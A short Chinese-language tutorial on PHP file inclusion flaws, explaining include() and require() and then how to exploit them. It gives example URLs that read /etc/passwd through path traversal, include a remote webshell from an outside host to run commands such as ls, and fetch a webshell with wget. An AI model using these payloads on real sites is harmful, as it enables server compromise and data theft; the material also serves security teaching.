1.原理

服务器通过php特性（函数）去包含任意文件时候，由于未对文件来源进行过滤，从而造成包含一个攻击者恶意构造的文件，造成威胁。

php中有四个函数可用于文件包含，分别是include(),require()和include_once(),require_once()。

include()函数可包含文件，当包含外部文件发生错误时，系统会给出警告，但文件会继续执行。

require()函数可包含文件，当包含外部文件发生错误时，系统会给出警告，但文件会停止执行。

Include_once:这个函数跟include函数作用几乎相同，只是他在导入函数之前先检测下该文件是否被导入。如果已经执行一遍那么就不重复执行了。

Require_once:这个函数跟require的区别跟上面我所讲的include和include_once是一样的。所以我就不重复了。

2.为什么要包含文件

因为程序员不想重复写同样的代码，也不想代码复制多遍，通过包含的方法就可以直接使用里面的代码不需要再进行其他操作，所以大量地解放生产力。

3.如何利用

A:包含读出其他的文件

利用应用程序对文件包含处的参数过滤不严的漏洞，读取其他文件，例如指定URL为：http://hi.baidu.com/m4r10/php/index.php?page=./txt，这样可以直接读出该路径下面所有的txt文件，你可以用这种方法探查某文件存在与否，如果该地方参数未对../进行过滤的话，那你可以利用../来跳出当前路径，如果他的权限比较高的话，那你甚至可以进行输入绝对路径试一下，例如http://hi.baidu.com/m4r10/php/index.php?page=/etc/passwd。

B:远程文件包含可运行的PHP木马

如果目标主机的"allow_url_fopen"是激活的（默认是激活的，没几个人会修改），我们就可以有更大的利用空间，我们可以指定其它URL上的一个包含PHP代码的webshell来直接运行，例如http://hi.baidu.com/m4r10/php/index.php?page= http://www.xxx.cn/cmd.txt?cmd=ls,cmd.txt为小马，可执行cmd命令，cmd=为接受命令参数。

C:包含一个创建文件的PHP文件

这种方法可有两种手段

1.通过wget方法来下载一个webshell

例如http://hi.baidu.com/m4r10/php/index.php?page= http://www.xxx.cn/cmd.txt?cmd=wget .........

2.直接创建一个新文件

如果主机禁用了wget这个命令或者当前目录禁止写操作，那就使用一个可以创建文件的脚本，找一个可以创建文件的目录进行创建。